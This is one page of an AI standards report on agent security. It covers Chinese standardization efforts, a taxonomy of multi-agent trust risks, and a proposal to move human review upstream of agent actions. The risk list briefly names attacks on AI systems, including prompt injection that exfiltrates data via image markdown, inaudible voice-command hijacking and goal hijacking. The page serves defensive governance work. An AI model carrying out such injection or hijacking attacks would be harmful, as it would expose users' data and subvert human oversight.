Page 86 - AI Standards for Global Impact: From Governance to Action
P. 86

AI Standards for Global Impact: From Governance to Action



                  13)  In China’s AI Agents security initiatives, China's Ministry of Industry and Information
                       Technology's Technical Committee on AI (MIIT/TC1) launched a standard project about
                       general security requirements of AI Agents. And the China Academy of Information
                       and Communications Technology (CAICT) has built a comprehensive Trusted Agent
                       Testbed to support four major testing scenarios: protocol verification test, benchmark
                       test, collaborative test, and security test to advance standardization, lowering testing costs
                       and improving coordination efficiency.
                  14)  While agents demonstrate remarkable strengths in goal-driven planning, adaptive
                       learning, and collaborative work, these three features may unleash unforeseen risks. First,
                       agents optimize for goals but lack human ethics/context, potentially leading to unintended
                       consequences (e.g. a smart home agent shuts off the refrigerator to save energy, ignoring
                       food preservation). Second, agents evolve with new data in unpredictable ways (e.g. a
                       companion agent disobeys rules to get candy for a user, prioritizing immediate requests
                       over parental instructions). Third, multi-agent systems interact in unforeseen patterns,
                       causing systemic chaos (e.g. traffic light agents and self-driving cars pursue conflicting
                       goals, worsening congestion)
                  15)  Trust risks in multi-agent AI systems across three layers:

                       a)  At the single-agent autonomy layer, risks involve excessive independence (e.g. the AI
                          scheme’s overreach in recovering welfare overpayments) and unauthorized actions.
                       b)  At the tool/MCP connectivity layer, systems face adversarial attacks (e.g. Dolphin Attack
                          hijacking voice - controlled AI via inaudible signals) and data exposure (e.g. prompt
                          injection stealing data through image markdown).
                       c)  At the multi-agent collaboration layer, threats include identity spoofing (e.g. malicious
                          drones posing as legitimate swarm members) and goal hijacking (e.g. man-in-the-
                          middle attacks on cobots to prioritize speed over quality).

                  16)  Security standardization for multi-agent governance should start with single agent and
                       consider three levels: technical, governance, and ecosystem. In terms of Trust Ecosystem,
                       decentralized identity and consensus mechanisms can be used to build trust-by-design
                       collaboration foundations. In terms of governance, there is potential to adopt human-
                       machine collaboration, referencing frameworks like NIST AI RMF/ISO/IEC 42001 to
                       manage dynamic risks. In terms of technology, end-to-end security can be applied across
                       the agent lifecycle, aligning with policies (e.g. China’s AI content rules) and industry efforts
                       (e.g. Ant Group’s runtime security work).
                  17)  We are currently on track for a “crisis of review”, since agents cannot be trusted to review
                       their own or other agents’ output or behaviours

                       o  AI outputs are cheaper and faster than the human equivalent, but for important outputs
                          there is always going to be a human who is responsible for the outcome (e.g. a job
                          interviewer, corporate officer/signatory, board member, regulator). That person will
                          either be overwhelmed by outputs and become a bottleneck or will simply give rubber-
                          stamp approval (or be outcompeted by someone who does).
                       o  The solution could be to move the review upstream of the action, expressing all the
                          constraints.

                  18)  This could be specifically solved with: (a) an separable, auditable model of the relevant
                       system in which the agent acts, (b) a way of expressing safe or approved behaviour,
                       grounded within the context of the model, and (c) a requirement that the agent provide
                       evidence that its actions are compliant with the definition of safe within the scope of the
                       model.
                       o  Combined, these three pieces become a meta-level requirement that gives a standard
                          for communicating constraints
                       o  This is actually a generalization of how safety is tested in other engineering domains,
                          like civil engineering or pharmaceuticals. The {model, safety criteria, evidence} for
                          civil engineering are things like {physics models, load limits, design files+reports} and



                                                           74
   81   82   83   84   85   86   87   88   89   90   91